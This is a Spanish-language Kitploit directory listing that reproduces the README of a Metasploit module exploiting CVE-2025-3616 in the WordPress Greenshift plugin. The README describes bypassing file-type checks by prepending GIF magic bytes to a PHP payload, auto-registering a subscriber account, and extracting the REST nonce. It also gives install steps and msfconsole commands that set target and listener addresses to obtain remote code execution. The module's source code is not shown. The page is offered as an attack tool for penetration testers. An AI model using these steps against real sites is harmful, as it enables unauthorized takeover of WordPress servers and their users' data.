Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-3616 — Metasploit module que explota la carga arbitraria de archivos en el plugin Greenshift de WordPress (CVE-2025-3616) para lograr RCE mediante suplantación de MIME, con auto-registro y extracción de nonce. | Kitploit
Herramientas/GitHubGitHub/b4d-53ct0r/cve-2025-3616
Frameworks de ExploitsAnálisis de VulnerabilidadesExplotación de Aplicaciones WebPruebas de PenetraciónAutenticaciónDesarrollo de Payloads
GitHubb4d-53ct0r/cve-2025-3616

CVE-2025-3616

Metasploit module que explota la carga arbitraria de archivos en el plugin Greenshift de WordPress (CVE-2025-3616) para lograr RCE mediante suplantación de MIME, con auto-registro y extracción de nonce.

Ver Repositorio
12hace 8 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Módulo de Metasploit: Subida de Archivos Arbitraria en el Plugin Greenshift de WordPress (CVE-2025-3616)

Este repositorio contiene un módulo de Metasploit para explotar la CVE-2025-3616, una vulnerabilidad de subida de archivos arbitraria en el plugin Greenshift de WordPress (versiones 11.4 a 11.4.5).

El exploit permite a usuarios autenticados (Suscriptor+) subir archivos arbitrarios, lo que conduce a la ejecución remota de código (RCE). Omite la validación del tipo de archivo del plugin falsificando el tipo MIME mediante los bytes mágicos GIF (GIF89a;).

Características

  • Manejo de autenticación: Permite iniciar sesión con credenciales existentes (USERNAME/PASSWORD).
  • Auto-registro: Incluye una opción REGISTER para registrar automáticamente un nuevo usuario y explotar la vulnerabilidad usando las cookies de sesión recién obtenidas (útil si el registro está habilitado en el objetivo).
  • Extracción de nonce: Extrae automáticamente el nonce wp_rest requerido del panel de administración.
  • Omisión de seguridad: Antepone los bytes mágicos GIF a la carga útil PHP para omitir la verificación de finfo_file().

Instalación

  1. Asegúrate de tener instalado Metasploit Framework.

  2. Copia wp_greenshift_file_upload.rb a tu directorio local de módulos:

    mkdir -p ~/.msf4/modules/exploits/unix/webapp/
    cp wp_greenshift_file_upload.rb ~/.msf4/modules/exploits/unix/webapp/
    
  3. Inicia msfconsole y recarga los módulos:

    msfconsole
    msf6 > reload_all
    

Uso

1. Uso de auto-registro (Recomendado)

Si el registro de usuarios está habilitado en el objetivo, no necesitas credenciales.

use exploit/unix/webapp/wp_greenshift_file_upload
set RHOSTS <TARGET_IP>
set LHOST <YOUR_IP>
set REGISTER true
run

2. Uso de credenciales existentes

Si ya tienes un usuario válido (Suscriptor o superior):

use exploit/unix/webapp/wp_greenshift_file_upload
set RHOSTS <TARGET_IP>
set LHOST <YOUR_IP>
set REGISTER false
set USERNAME <USER>
set PASSWORD <PASS>
run

Opciones

OpciónRequeridoDescripción
RHOSTSSíLa dirección del objetivo
LHOSTSíLa dirección de escucha (tu IP)
REGISTERNoEstablécelo en true para registrar una nueva cuenta automáticamente (Por defecto: false)
USERNAMENoNombre de usuario de WordPress (requerido si REGISTER es false)
PASSWORDNoContraseña de WordPress (requerida si REGISTER es false)
EMAILNoCorreo electrónico para el registro (opcional, se genera automáticamente si está vacío)

Descargo de responsabilidad

Este módulo es solo para fines educativos y pruebas de penetración autorizadas. El uso de este código para atacar objetivos sin consentimiento mutuo previo es ilegal.

Descargar herramienta